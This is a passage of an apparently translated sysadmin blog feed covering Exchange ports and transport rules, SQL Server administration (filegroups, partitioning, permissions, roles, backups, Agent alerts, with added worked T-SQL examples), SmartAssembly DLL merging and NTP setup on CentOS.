</tr>
<tr>
<td>DATA</td>
<td>sends the message to the destination server</td>
</tr>
<tr>
<td>RSET</td>
<td>aborts the message currently being sent</td>
</tr>
<tr>
<td>VRFY &lt;string&gt;</td>
<td>checks that the recipient is valid on the destination server</td>
</tr>
<tr>
<td>HELP</td>
<td>lists the supported SMTP commands</td>
</tr>
<tr>
<td>QUIT</td>
<td>closes the session</td>
</tr>
<tr>
<td>TURN</td>
<td>sends the queued messages</td>
</tr>
</tbody>
</table>
<h2>Protocols</h2>
<p><img alt="" src="https://img.nlegall.fr/WMmhAKW2"></p>
<table>
<thead>
<tr>
<th>Protocol</th>
<th>Unsecured port</th>
<th>TLS/SSL port</th>
</tr>
</thead>
<tbody>
<tr>
<td>HTTP</td>
<td>80</td>
<td>443</td>
</tr>
<tr>
<td>POP3</td>
<td>110</td>
<td>995</td>
</tr>
<tr>
<td>IMAP4</td>
<td>143</td>
<td>993</td>
</tr>
<tr>
<td>SMTP</td>
<td>25</td>
<td>25</td>
</tr>
<tr>
<td>Client submission</td>
<td>587</td>
<td>587</td>
</tr>
<tr>
<td>EdgeSync/ADAM synchronization</td>
<td>50636</td>
<td>50636</td>
</tr>
</tbody>
</table>
<h1>S/MIME</h1>
<p><img alt="" src="https://img.nlegall.fr/iL47gp9M"></p>
<h1>Backup</h1>
<ul>
<li>For all roles: the full system and the ActiveSync configuration</li>
<li>For Mailbox servers: databases and logs (VSS)</li>
<li>For CAS: SSL certificates and the full IIS configuration</li>
<li><code>.\appcmd.exe add backup IIS</code></li>
<li>Retention period for deleted items and deleted mailboxes (the rule closest to the object wins)</li>
</ul>
<h2>Restore</h2>
<table>
<thead>
<tr>
<th>Name</th>
<th>Definition</th>
</tr>
</thead>
<tbody>
<tr>
<td>Database restore</td>
<td>Replaces an existing database</td>
</tr>
<tr>
<td>Recovery database</td>
<td>Restores the lost database into the recovery database from a backup</td>
</tr>
<tr>
<td>Dial tone recovery</td>
<td>Brings the Exchange service back up before the mail history is restored</td>
</tr>
<tr>
<td>DAG recovery</td>
<td>Mounts a passive copy of a DAG database on another Mailbox server</td>
</tr>
</tbody>
</table>
<h1>Transport rules</h1>
<ul>
<li>Limit message flows</li>
<li>Modify the content of messages in transit</li>
<li>Prevent specified users from exchanging e-mail with other defined users</li>
<li>Block any inappropriate inbound or outbound content</li>
<li>Apply restrictions based on message classifications to restrict the flow of the organization's confidential information</li>
<li>Track or journal messages exchanged with certain people</li>
<li>Redirect inbound or outbound messages for review before delivery</li>
</ul>
<h1>Firewall</h1>
<table>
<thead>
<tr>
<th>Firewall</th>
<th>Firewall rule</th>
<th>Explanation</th>
</tr>
</thead>
<tbody>
<tr>
<td>External</td>
<td>Allow TCP/25 from external IPs to the relay</td>
<td>Lets SMTP hosts on the Internet send mail</td>
</tr>
<tr>
<td>External</td>
<td>Allow TCP/25 from the relay to external IPs</td>
<td>Lets the relay send mail to SMTP hosts on the Internet</td>
</tr>
<tr>
<td>External</td>
<td>Allow TCP/53 and UDP/53 from the relay to external IPs</td>
<td>Allows DNS name resolution on the Internet</td>
</tr>
<tr>
<td>Internal</td>
<td>Allow TCP/25 from the relay to the CAS</td>
<td>Lets the SMTP relay send mail to the CAS</td>
</tr>
<tr>
<td>Internal</td>
<td>Allow TCP/25 from the CAS to the relay</td>
<td>Lets the CAS send mail to the relay</td>
</tr>
<tr>
<td>Internal</td>
<td>If AD LDS is used, allow TCP/50636 from the CAS to the relay</td>
<td>Allows communication between AD DS and AD LDS</td>
</tr>
</tbody>
</table>
MS SQL Server 2018-11-24T10:20:00+01:00 2018-11-24T10:20:00+01:00 nlegall tag:blog.nlegall.fr,2018-11-24:/ms-sql-server.html
<h1>SQL Server command types</h1>
<table>
<thead>
<tr>
<th>DDL (data definition language)</th>
<th>DML (data manipulation language)</th>
<th>DCL (data control language)</th>
<th>TCL (transaction control language)</th>
</tr>
</thead>
<tbody>
<tr>
<td>CREATE</td>
<td>INSERT</td>
<td>GRANT</td>
<td>BEGIN</td>
</tr>
<tr>
<td>DROP</td>
<td>UPDATE</td>
<td>REVOKE</td>
<td>TRAN</td>
</tr>
<tr>
<td>TRUNCATE</td>
<td>DELETE</td>
<td></td>
<td>COMMIT</td>
</tr>
<tr>
<td>ALTER</td>
<td>SELECT</td>
<td></td>
<td>ROLLBACK</td>
</tr>
</tbody>
</table>
<h1>Files</h1>
<p><img alt="" src="https://img.nlegall.fr/Sem8Qmy3"></p>
<p>It is recommended to keep the two kinds of files (database and logs) on different disks to improve I/O performance.</p>
<table>
<thead>
<tr>
<th>Extension</th>
<th>Role</th>
</tr>
</thead>
<tbody>
<tr>
<td>mdf (master data file)</td>
<td>User and system data</td>
</tr>
<tr>
<td>ndf (secondary data file)</td>
<td>User data</td>
</tr>
<tr>
<td>ldf</td>
<td>Transaction log (restore/backup)</td>
</tr>
</tbody>
</table>
<p>By default, the MDF and NDF files are grouped in the PRIMARY filegroup. It can however be wise to split these files into different filegroups so they can be placed on different physical media.</p>
<p><img alt="" src="https://img.nlegall.fr/3mwVjjfQ"></p>
<h1>Création d'une base de données</h1>
<div class="highlight"><pre><span></span><code>CREATE DATABASE DB
-- filegroup; NAME and FILENAME are required in every file specification
ON PRIMARY
(
NAME = "DB",
FILENAME = 'C:\xxxx',
SIZE = 5120KB,
MAXSIZE = 15360KB,
FILEGROWTH = 1024KB
)
LOG ON
(
-- logical name
NAME = "DB_log",
-- physical path (a string literal, hence single quotes)
FILENAME = 'C:\xxxx',
-- initial size
SIZE = 1024KB,
-- allowed growth
FILEGROWTH = 10%
)
</code></pre></div>
<div class="highlight"><pre><span></span><code>-- list of databases with their primary (MDF) file
-- (sys.sysdatabases is a deprecated compatibility view; sys.databases and sys.master_files are the current equivalents)
SELECT * FROM sys.sysdatabases
-- list of all the files used by the current database (size is in 8 KB pages)
SELECT * FROM sys.database_files
</code></pre></div>
<p>A second file for user data can be added to the database. To do so, a new filegroup must be created first.</p>
<div class="highlight"><pre><span></span><code>-- Create the new filegroup
ALTER DATABASE BDD ADD FILEGROUP DATA;
-- Add a file to it (without TO FILEGROUP the file would land in the default filegroup, PRIMARY)
ALTER DATABASE BDD ADD FILE (
NAME = "BDD2",
FILENAME = 'C:\xxxx',
SIZE = 5120KB,
FILEGROWTH = 1024KB
)
TO FILEGROUP DATA;
</code></pre></div>
<p>However, once a file is associated with a filegroup, it <strong>can no longer be moved</strong> to another filegroup. The same applies to a table created on a particular filegroup.</p>
<blockquote>
<p>The physical layout therefore has to be planned when the database is designed, not afterwards. It makes it possible to spread tables over several disks (better I/O).</p>
</blockquote>
<h1>Partitioning</h1>
<p><img alt="" src="https://img.nlegall.fr/p4OxTVWe"></p>
<p>Allows a large table to be split into several sub-tables. Each of them can be created on a different filegroup in order to benefit from the advantages of filegroups.</p>
<p>The partitioned columns must however be part of the table's primary key.</p>
<ol>
<li>Create the filegroups</li>
<li>Partition function (boundary values, RIGHT or LEFT, data type)</li>
<li>Partition scheme (map the partitions to the filegroups)</li>
<li>Create the tables: <code>CREATE TABLE table () ON scheme(column)</code></li>
</ol>
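<p>The four steps above carried through end to end, as an added example that is not part of the original notes. The database name <code>DB</code>, the paths under <code>C:\data\</code>, the filegroup names and the <code>dbo.AuditLog</code> table are assumptions.</p>

```sql
-- Added example (not from the original notes): partitioning a table by year.
-- Database "DB", the C:\data\ paths, filegroup and table names are assumptions.
USE master;
GO
-- 1. Filegroups, one per disk, each receiving its own secondary (.ndf) data file
ALTER DATABASE DB ADD FILEGROUP FG_2018;
ALTER DATABASE DB ADD FILEGROUP FG_2019;
ALTER DATABASE DB ADD FILEGROUP FG_2020;
ALTER DATABASE DB ADD FILE
    (NAME = 'DB_2018', FILENAME = 'C:\data\DB_2018.ndf', SIZE = 5120KB, FILEGROWTH = 1024KB)
    TO FILEGROUP FG_2018;
ALTER DATABASE DB ADD FILE
    (NAME = 'DB_2019', FILENAME = 'C:\data\DB_2019.ndf', SIZE = 5120KB, FILEGROWTH = 1024KB)
    TO FILEGROUP FG_2019;
ALTER DATABASE DB ADD FILE
    (NAME = 'DB_2020', FILENAME = 'C:\data\DB_2020.ndf', SIZE = 5120KB, FILEGROWTH = 1024KB)
    TO FILEGROUP FG_2020;
GO
USE DB;
GO
-- 2. Partition function: data type, boundary values and side.
--    RANGE RIGHT puts each boundary value in the partition to its right, so
--    '2019-01-01' opens the 2019 partition (ranges: before 2019, 2019, 2020 and later).
CREATE PARTITION FUNCTION pf_ByYear (date)
    AS RANGE RIGHT FOR VALUES ('2019-01-01', '2020-01-01');
GO
-- 3. Partition scheme: which filegroup receives each partition.
--    Two boundaries give three ranges, so three filegroups are listed.
CREATE PARTITION SCHEME ps_ByYear
    AS PARTITION pf_ByYear TO (FG_2018, FG_2019, FG_2020);
GO
-- 4. Table created on the scheme. The partitioning column has to be part of
--    the clustered primary key, hence the composite key.
CREATE TABLE dbo.AuditLog (
    EventId   bigint IDENTITY(1,1) NOT NULL,
    EventDate date           NOT NULL,
    Actor     sysname        NOT NULL,
    Detail    nvarchar(4000) NULL,
    CONSTRAINT PK_AuditLog PRIMARY KEY CLUSTERED (EventDate, EventId)
) ON ps_ByYear (EventDate);
GO
-- Check: $PARTITION reports the partition number each row is stored in
INSERT INTO dbo.AuditLog (EventDate, Actor, Detail)
VALUES ('2018-06-01', N'svc_etl', N'nightly load'),    -- constructed sample rows
       ('2019-03-15', N'alice',   N'schema change'),
       ('2020-05-20', N'bob',     N'backup verified');
SELECT EventDate, $PARTITION.pf_ByYear(EventDate) AS PartitionNumber
FROM dbo.AuditLog
ORDER BY EventDate;
```

<p>Rows dated before 2019, in 2019 and from 2020 onwards end up in partitions 1, 2 and 3, i.e. on FG_2018, FG_2019 and FG_2020 respectively.</p>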
<h1>Authentication</h1>
<p><img alt="" src="https://img.nlegall.fr/KfgB21ub"></p>
<p>Possible mappings:</p>
<ul>
<li>Explicit: <code>CREATE USER</code></li>
<li>Implicit: through guest/dbo</li>
</ul>
<h2>GRANT</h2>
<p>Grants a permission to a user</p>
<div class="highlight"><pre><span></span><code><span class="k">GRANT</span> <span class="k">INSERT</span> <span class="k">ON</span> <span class="n">dbname</span> <span class="k">TO</span> <span class="k">user</span><span class="p">;</span>
</code></pre></div>
<h2>REVOKE</h2>
<p>Revokes a permission from a user</p>
<div class="highlight"><pre><span></span><code><span class="k">REVOKE</span> <span class="k">INSERT</span> <span class="k">ON</span> <span class="n">dbname</span> <span class="k">TO</span> <span class="k">user</span><span class="p">;</span>
</code></pre></div>
<h2>DENY</h2>
<p>Denies an action to a user</p>
<div class="highlight"><pre><span></span><code><span class="n">DENY</span> <span class="k">INSERT</span> <span class="k">ON</span> <span class="n">dbname</span> <span class="k">TO</span> <span class="k">user</span><span class="p">;</span>
</code></pre></div>
<h1>Roles</h1>
<p>They are defined at three levels:</p>
<ul>
<li>Instance</li>
<li>Database</li>
<li>Application</li>
</ul>
<p><img alt="" src="https://img.nlegall.fr/Wzxot7k5"></p>
<h2>Instance roles</h2>
<table>
<thead>
<tr>
<th>Name</th>
<th>Rights</th>
</tr>
</thead>
<tbody>
<tr>
<td>sysadmin</td>
<td>Instance administrator</td>
</tr>
<tr>
<td>serveradmin</td>
<td>Instance settings</td>
</tr>
<tr>
<td>setupadmin</td>
<td>Add/remove instances and the <code>sp_serveroption</code> procedures</td>
</tr>
<tr>
<td>securityadmin</td>
<td>Logins to the instance</td>
</tr>
<tr>
<td>processadmin</td>
<td>Processes running in SQL Server</td>
</tr>
<tr>
<td>dbcreator</td>
<td>Create/alter databases</td>
</tr>
<tr>
<td>diskadmin</td>
<td>Database files</td>
</tr>
<tr>
<td>bulkadmin</td>
<td>BULK INSERT</td>
</tr>
</tbody>
</table>
<h2>Database roles</h2>
<blockquote>
<p>member of <code>sysadmin</code>, <code>db_owner</code> or <code>db_securityadmin</code></p>
</blockquote>
<p>Groups the various permissions or denials. Applies to databases.</p>
<div class="highlight"><pre><span></span><code>USE bdd
CREATE ROLE name
-- database-scoped permissions, hence no ON clause
GRANT INSERT,UPDATE,DELETE TO name
ALTER ROLE name ADD MEMBER user
-- schema-scoped permission
GRANT SELECT ON schema::dbo TO user
</code></pre></div>
<p>The dbo user account is frequently confused with the db_owner fixed database role. The scope of db_owner is a database, whereas the scope of sysadmin is the whole server. Membership in the db_owner role does not confer the privileges of the dbo user.</p>
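<p>How GRANT, DENY and REVOKE combine when a permission comes through a database role, as an added example that is not part of the original notes (it serves both the GRANT/REVOKE/DENY section and the database roles section). The database <code>DB</code>, the table <code>dbo.Salaries</code>, the role <code>app_writer</code> and the user <code>carol</code> are assumptions.</p>

```sql
-- Added example (not from the original notes): precedence of GRANT, DENY and
-- REVOKE with a role in between. DB, dbo.Salaries, app_writer and carol are assumptions.
USE DB;
GO
CREATE TABLE dbo.Salaries (EmployeeId int PRIMARY KEY, Amount money NOT NULL);
-- A database user without a login is enough for a local test
CREATE USER carol WITHOUT LOGIN;
GO
-- The grants are held by the role; the user only gets them through membership
CREATE ROLE app_writer;
GRANT SELECT, INSERT ON OBJECT::dbo.Salaries TO app_writer;
ALTER ROLE app_writer ADD MEMBER carol;
GO
-- Effective permission, evaluated as carol: the role's GRANT applies
EXECUTE AS USER = 'carol';
SELECT HAS_PERMS_BY_NAME('dbo.Salaries', 'OBJECT', 'INSERT') AS can_insert;
REVERT;
GO
-- An explicit DENY on the user takes precedence over the GRANT inherited from the role
DENY INSERT ON OBJECT::dbo.Salaries TO carol;
EXECUTE AS USER = 'carol';
SELECT HAS_PERMS_BY_NAME('dbo.Salaries', 'OBJECT', 'INSERT') AS can_insert;
REVERT;
GO
-- REVOKE only deletes the explicit entry recorded for that principal: removing
-- the DENY lets the role's GRANT apply again; it removes nothing inherited.
REVOKE INSERT ON OBJECT::dbo.Salaries FROM carol;
EXECUTE AS USER = 'carol';
SELECT HAS_PERMS_BY_NAME('dbo.Salaries', 'OBJECT', 'INSERT') AS can_insert;
REVERT;
GO
-- What the catalog records: one row per explicit GRANT or DENY, with its state.
-- Caveat: a DENY has no effect on dbo, db_owner members or sysadmin members,
-- who bypass permission checks in the database.
SELECT pr.name AS principal, pe.permission_name, pe.state_desc
FROM sys.database_permissions AS pe
JOIN sys.database_principals AS pr ON pr.principal_id = pe.grantee_principal_id
WHERE pe.major_id = OBJECT_ID('dbo.Salaries');
```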
<h2>Application roles</h2>
<p>Same as database roles but at the table level. No user can be added to them and they are protected by a password. These roles take precedence over the other roles that may be defined.</p>
<div class="highlight"><pre><span></span><code><span class="n">sp_setapprole</span> <span class="s1">'role'</span><span class="p">,</span> <span class="s1">'password'</span>
</code></pre></div>
<h1>Views</h1>
<p>A view can be used for the following purposes:</p>
<ul>
<li>to focus, simplify and customize each user's perception of the database.</li>
<li>as a security mechanism, by letting users access data through the view without granting them permissions that would let them directly access the view's underlying base tables.</li>
<li>to provide a backward-compatible interface that emulates a table whose schema has changed.</li>
</ul>
<div class="highlight"><pre><span></span><code><span class="k">CREATE</span> <span class="k">VIEW</span> <span class="n">Employee</span> <span class="k">AS</span>
<span class="k">SELECT</span> <span class="n">Name</span><span class="p">,</span> <span class="n">BirthDate</span><span class="p">,</span> <span class="n">Salary</span><span class="p">,</span> <span class="n">BuildingName</span>
<span class="k">FROM</span> <span class="n">Employee2</span> <span class="n">e</span><span class="p">,</span> <span class="n">Department</span> <span class="n">d</span>
<span class="k">WHERE</span> <span class="n">e</span><span class="p">.</span><span class="n">DeptId</span> <span class="o">=</span> <span class="n">d</span><span class="p">.</span><span class="n">DeptId</span>
</code></pre></div>
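<p>The second purpose above (a view as a security boundary) shown in practice, as an added example that is not part of the original notes. The database <code>DB</code>, the table <code>dbo.Employee2</code>, the view <code>dbo.EmployeePublic</code> and the user <code>intern</code> are assumptions.</p>

```sql
-- Added example (not from the original notes): granting access to a view only.
-- DB, dbo.Employee2, dbo.EmployeePublic and the user intern are assumptions.
USE DB;
GO
CREATE TABLE dbo.Employee2 (
    EmpId int PRIMARY KEY, Name nvarchar(100), BirthDate date,
    Salary money, DeptId int);
-- constructed sample rows
INSERT INTO dbo.Employee2 VALUES (1, N'Alice', '1990-01-01', 5000, 10),
                                 (2, N'Bob',   '1985-05-05', 6000, 20);
GO
-- The view exposes only the non-sensitive columns
CREATE VIEW dbo.EmployeePublic AS
    SELECT EmpId, Name, DeptId FROM dbo.Employee2;
GO
CREATE USER intern WITHOUT LOGIN;
GRANT SELECT ON OBJECT::dbo.EmployeePublic TO intern;   -- nothing granted on the table
GO
EXECUTE AS USER = 'intern';
-- Allowed: view and table have the same owner (dbo), so the ownership chain
-- skips the permission check on the underlying table.
SELECT * FROM dbo.EmployeePublic;
-- Denied: direct access to the table is refused (error 229, SELECT permission denied)
BEGIN TRY
    SELECT Salary FROM dbo.Employee2;
END TRY
BEGIN CATCH
    SELECT ERROR_NUMBER() AS err, ERROR_MESSAGE() AS msg;
END CATCH;
REVERT;
GO
-- Caveat: the chain breaks if the view and the table have different owners;
-- intern would then also need SELECT on the table, which defeats the purpose.
```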
<h1>System information</h1>
<div class="highlight"><pre><span></span><code>-- Logins
USE master
SELECT * FROM sys.sql_logins -- SQL Server authentication only
SELECT * FROM sys.server_principals
SELECT * FROM sys.server_permissions -- GRANTEE: who receives / GRANTOR: who granted
SELECT * FROM sys.server_role_members
SELECT name, permission_name FROM sys.server_principals who INNER JOIN
sys.server_permissions what ON who.principal_id = what.grantee_principal_id
-- Users
USE bddname
SELECT * FROM sys.database_principals
SELECT * FROM sys.database_permissions -- GRANTEE: who receives / GRANTOR: who granted
SELECT * FROM sys.database_role_members
</code></pre></div>
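<p>The same catalog views joined so that the result shows names instead of ids, as an added example that is not part of the original notes; it is the form a permissions review is usually run in. The database name <code>DB</code> is an assumption.</p>

```sql
-- Added example (not from the original notes): the catalog views resolved to names.
-- Run the first part in master, the second in the database to audit (DB is assumed).
USE master;
GO
-- Who is in which fixed server role, sysadmin first
SELECT r.name AS server_role, m.name AS member, m.type_desc, m.is_disabled
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals AS m ON m.principal_id = rm.member_principal_id
ORDER BY CASE WHEN r.name = 'sysadmin' THEN 0 ELSE 1 END, r.name, m.name;
GO
-- SQL logins that escape the Windows password policy or expiration
SELECT name, is_policy_checked, is_expiration_checked, is_disabled
FROM sys.sql_logins
WHERE is_policy_checked = 0 OR is_expiration_checked = 0;
GO
USE DB;
GO
-- Database role membership by name
SELECT r.name AS db_role, m.name AS member, m.type_desc
FROM sys.database_role_members AS rm
JOIN sys.database_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.database_principals AS m ON m.principal_id = rm.member_principal_id
ORDER BY r.name, m.name;
GO
-- Explicit permissions: grantee, state (GRANT/DENY), permission, object, grantor
SELECT pr.name AS grantee, pe.state_desc, pe.permission_name,
       pe.class_desc, OBJECT_NAME(pe.major_id) AS object_name,
       gr.name AS grantor
FROM sys.database_permissions AS pe
JOIN sys.database_principals AS pr ON pr.principal_id = pe.grantee_principal_id
JOIN sys.database_principals AS gr ON gr.principal_id = pe.grantor_principal_id
WHERE pe.class_desc IN ('OBJECT_OR_COLUMN', 'SCHEMA', 'DATABASE')
ORDER BY pe.state_desc, pr.name;
```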
<h1>Job scheduling</h1>
<p><em>All of this data is stored in the MSDB database.</em></p>
<p><img alt="" src="https://img.nlegall.fr/Vphb65HV"></p>
<ul>
<li>Job: automation of administrative or repetitive tasks. It can be scheduled or run manually. Jobs are stored in the sysjobs table. The SQL Server Agent is in charge of running them.</li>
<li>Alert: triggers an automatic action to fix a problem and/or notify an operator. It can be tied to an error number or to an error message severity. It is valid for one or all databases of an instance.</li>
<li>Operator: a person or role notified when a job finishes or when an alert fires, to report the seriousness of the situation. Three possible channels: email, pager or network message (net send). It has no link with a database user.</li>
</ul>
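<p>An operator, two alerts (one by error number, one by severity) and the notifications linking them, created with the msdb stored procedures, as an added example that is not part of the original notes. The operator name and email address are assumptions.</p>

```sql
-- Added example (not from the original notes): operator + alerts + notifications in msdb.
-- The operator name and its address are assumptions (placeholder domain).
USE msdb;
GO
EXEC dbo.sp_add_operator
    @name = N'dba_oncall',
    @enabled = 1,
    @email_address = N'dba-oncall@example.invalid';
-- Alert tied to an error number: @severity must then be 0.
-- Alerts are raised from errors written to the event log, so 18456 (login
-- failed) only fires when failed logins are audited by the instance.
EXEC dbo.sp_add_alert
    @name = N'Failed login',
    @message_id = 18456,
    @severity = 0,
    @enabled = 1,
    @delay_between_responses = 60,      -- seconds; throttles a burst of failures
    @include_event_description_in = 1;  -- 1 = put the error text in the email
-- Alert tied to a severity instead: every severity 20 (fatal) error, any database
EXEC dbo.sp_add_alert
    @name = N'Fatal error severity 20',
    @message_id = 0,
    @severity = 20,
    @enabled = 1,
    @delay_between_responses = 60,
    @include_event_description_in = 1;
-- Notification: which operator is told, through which channel (1 = email)
EXEC dbo.sp_add_notification
    @alert_name = N'Failed login',
    @operator_name = N'dba_oncall',
    @notification_method = 1;
EXEC dbo.sp_add_notification
    @alert_name = N'Fatal error severity 20',
    @operator_name = N'dba_oncall',
    @notification_method = 1;
GO
-- Everything lands in msdb tables, as the note above says
SELECT a.name AS alert, a.message_id, a.severity, a.enabled, o.name AS operator
FROM dbo.sysalerts AS a
JOIN dbo.sysnotifications AS n ON n.alert_id = a.id
JOIN dbo.sysoperators AS o ON o.id = n.operator_id;
```

<p>Email delivery additionally requires Database Mail to be configured and the Agent to use a mail profile, which this example does not cover.</p>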
<h1>Backups</h1>
<ul>
<li>Full: (data and logs) mandatory - long and bulky to back up, but quick to restore</li>
<li>Differential: (data) changes since the last full backup</li>
<li>Log: (logs) fast; empties the log of the statements before the last checkpoint - slow to restore since every statement is replayed</li>
</ul>
<div class="highlight"><pre><span></span><code>-- FULL
-- The backup is striped across two files (not mirrored): both files are needed to restore
BACKUP DATABASE name
TO DISK='C:\backups\name.bak',
DISK='C:\backups\name_2.bak'
WITH INIT,
-- name of the media set
MEDIANAME='Backup Full',
-- compress the backup file
COMPRESSION
-- DIFFERENTIAL
-- appended to the same media set, so both files must be given again
BACKUP DATABASE name
TO DISK='C:\backups\name.bak',
DISK='C:\backups\name_2.bak'
WITH DIFFERENTIAL, NOINIT,
MEDIANAME='Backup Full'
-- LOG
BACKUP LOG name
TO <backup_device>
</code></pre></div>
<h2>Recovery model</h2>
<ul>
<li>Simple: the log is only used to guarantee the durability of operations. It is emptied at each checkpoint.</li>
<li>Full: every action is written to the log and stays there even after a checkpoint.</li>
<li>Bulk-logged: transaction information, but also some operations affecting data (index creation).</li>
</ul>
<div class="highlight"><pre><span></span><code><span class="k">ALTER</span> <span class="k">DATABASE</span> <span class="n">name</span>
<span class="k">SET</span> <span class="n">RECOVERY</span> <span class="err">{</span> <span class="k">SIMPLE</span> <span class="o">|</span> <span class="k">FULL</span> <span class="o">|</span> <span class="n">BULK_LOGGED</span> <span class="err">}</span>
</code></pre></div>
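<p>A full + differential + log chain and the restore sequence that goes with it, as an added example that is not part of the original notes; it ties the backup types above to the recovery model, since log backups require FULL (or BULK_LOGGED). The database name <code>DB</code> and the paths under <code>C:\backups\</code> are assumptions.</p>

```sql
-- Added example (not from the original notes): backup chain and matching restore.
-- Database "DB" and the C:\backups\ paths are assumptions.
USE master;
GO
ALTER DATABASE DB SET RECOVERY FULL;
GO
-- 1. Full backup: new media set, checksums so corruption is detected at restore time
BACKUP DATABASE DB TO DISK = 'C:\backups\DB_full.bak'
    WITH INIT, CHECKSUM, COMPRESSION, NAME = 'DB full';
-- 2. Differential: only the pages changed since the last full backup
BACKUP DATABASE DB TO DISK = 'C:\backups\DB_diff.bak'
    WITH DIFFERENTIAL, INIT, CHECKSUM, NAME = 'DB diff';
-- 3. Log backup: every change since the previous log backup; truncates the log
BACKUP LOG DB TO DISK = 'C:\backups\DB_log1.trn' WITH INIT, CHECKSUM;
-- Check that the files are readable without restoring them
RESTORE VERIFYONLY FROM DISK = 'C:\backups\DB_full.bak' WITH CHECKSUM;
GO
-- Restore order: full, then the latest differential, then the logs in sequence.
-- NORECOVERY leaves the database waiting for the next file; only the last step recovers.
-- REPLACE overwrites the existing database without a tail-log backup, which loses
-- whatever was logged after DB_log1.trn; take a tail-log backup first when you can.
RESTORE DATABASE DB FROM DISK = 'C:\backups\DB_full.bak'
    WITH NORECOVERY, CHECKSUM, REPLACE;
RESTORE DATABASE DB FROM DISK = 'C:\backups\DB_diff.bak'
    WITH NORECOVERY, CHECKSUM;
-- A log restore can also stop at a point in time (STOPAT) inside the interval it covers
RESTORE LOG DB FROM DISK = 'C:\backups\DB_log1.trn'
    WITH RECOVERY, CHECKSUM;
GO
-- Backup history lives in msdb: check that the LSN chain is unbroken
SELECT bs.type, bs.backup_start_date, bs.first_lsn, bs.last_lsn, bmf.physical_device_name
FROM msdb.dbo.backupset AS bs
JOIN msdb.dbo.backupmediafamily AS bmf ON bmf.media_set_id = bs.media_set_id
WHERE bs.database_name = 'DB'
ORDER BY bs.backup_start_date;
```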
<h1>Optimization</h1>
<table>
<thead>
<tr>
<th>Performance</th>
<th>Space</th>
<th>DBA workload</th>
<th>Security</th>
<th>Integrity</th>
</tr>
</thead>
<tbody>
<tr>
<td>Hardware</td>
<td>Limit indexes</td>
<td>Scheduling</td>
<td>Roles</td>
<td>Constraints</td>
</tr>
<tr>
<td>Indexes</td>
<td>Data types</td>
<td>Alerts</td>
<td>Views</td>
<td>Backups</td>
</tr>
<tr>
<td>Filegroups</td>
<td>Compression (backups, tables, indexes)</td>
<td></td>
<td>Schemas</td>
<td>HA</td>
</tr>
<tr>
<td>Queries</td>
<td>Archiving</td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Data types</td>
<td>DBCC</td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
<h2>Disk space</h2>
<h2>SHRINKDATABASE</h2>
<p>Compacts all the files making up the database (logs and data).</p>
<h2>SHRINKFILE</h2>
<p>Compacts only one of the data files.</p>
<p><strong>.net framework</strong> - 2018-11-24T10:20:00+01:00 - nlegall - tag:blog.nlegall.fr,2018-11-24:/net-framework.html</p>
<p><img alt="" src="https://img.nlegall.fr/qARgTp0Q"></p>
<h1>DLL integration</h1>
<h2>Prerequisites</h2>
<ul>
<li>SmartAssembly : https://www.red-gate.com/products/dotnet-development/smartassembly/</li>
<li>.NET Framework 4.5.2 Developer Pack : https://www.microsoft.com/fr-fr/download/details.aspx?id=42637</li>
</ul>
<h2>Instructions</h2>
<p>Launch the application. You will have to select the application to which you want to add the DLLs. Then specify the output path for the new executable that will be generated.</p>
<p>Once that is done, you get a set of options. Scroll down to the <code>Dependencies Merging</code> section.</p>
<p><img alt="" src="https://img.nlegall.fr/rq1vjonb"></p>
<p>All the DLLs referenced by the application are listed there. Choose the ones you want to embed in the new binary.</p>
<p>Click the <code>Build</code> button.</p>
<h2>VS integration</h2>
<p><em>The binary generated by SA will then be in the path defined in the project created by the tool.</em></p>
<div class="highlight"><pre><span></span><code><span class="nt"><UsingTask</span> <span class="na">TaskName=</span><span class="s">"SmartAssembly.MSBuild.Tasks.Build"</span> <span class="na">AssemblyName=</span><span class="s">"SmartAssembly.MSBuild.Tasks, Version=6.0.0.0,Culture=neutral, PublicKeyToken=7f465a1c156d4d57"</span> <span class="nt">/></span>
<span class="nt"><Target</span> <span class="na">Name=</span><span class="s">"AfterBuild"</span> <span class="na">Condition=</span><span class="s">" '$(Configuration)' == 'Release' "</span><span class="nt">></span>
<span class="nt"><SmartAssembly.MSBuild.Tasks.Build</span> <span class="na">ProjectFile=</span><span class="s">"C:\path\to\project.saproj"</span> <span class="nt">/></span>
<span class="nt"></Target></span>
</code></pre></div>
<p><strong>NTP</strong> - 2018-11-24T10:20:00+01:00 - nlegall - tag:blog.nlegall.fr,2018-11-24:/ntp.html</p>
<p><em>RFC-1305</em></p>
<h1>How it works</h1>
<p>Network Time Protocol (NTP) is a protocol that synchronizes the local clock of computers over a network against a time reference.</p>
<p><img alt="" src="https://upload.wikimedia.org/wikipedia/commons/thumb/c/c9/Network_Time_Protocol_servers_and_clients.svg/470px-Network_Time_Protocol_servers_and_clients.svg.png"></p>
<h1>Server installation</h1>
<p>The daemon is not installed by default on the system, so it has to be added manually.</p>
<div class="highlight"><pre><span></span><code>yum install ntp ntpdate
</code></pre></div>
<p>The initial configuration of the file is sufficient. It may however be necessary to change the server list to pick servers that are geographically closer.</p>
<div class="highlight"><pre><span></span><code># vim /etc/ntp.conf
server 0.pool.ntp.org
server 1.pool.ntp.org
server 2.pool.ntp.org
server 3.pool.ntp.org
</code></pre></div>
<p>If the firewall is enabled, a rule must also be added to allow port UDP/123.</p>
<div class="highlight"><pre><span></span><code>firewall-cmd --zone=public --permanent --add-service=ntp
# --permanent only writes the configuration; reload to apply it to the running firewall
firewall-cmd --reload
</code></pre></div>
<h1>Client installation</h1>
<p>As for the server, the packages must be installed on the client(s) that will synchronize with the server.</p>
<div class="highlight"><pre><span></span><code>yum install ntp ntpdate
</code></pre></div>
<p>Unlike the previous configuration, only the relay NTP server is needed for synchronization.</p>
<div class="highlight"><pre><span></span><code># vim /etc/ntp.conf
server xxx.xxx.xxx.xxx
</code></pre></div>
<h1>Status</h1>
<div class="highlight"><pre><span></span><code>> systemctl status ntpd
> ntpq -p
remote refid st t when poll reach delay offset <span class="nv">jitter</span>
<span class="o">==============================================================================</span>
+herbrand.noumic <span class="m">193</span>.190.230.66 <span class="m">2</span> u <span class="m">112</span> <span class="m">128</span> <span class="m">377</span> <span class="m">30</span>.545 -0.753 <span class="m">0</span>.353
*dedibox.demonge <span class="m">195</span>.83.222.27 <span class="m">2</span> u <span class="m">138</span> <span class="m">128</span> <span class="m">376</span> <span class="m">25</span>.881 -1.174 <span class="m">2</span>.059
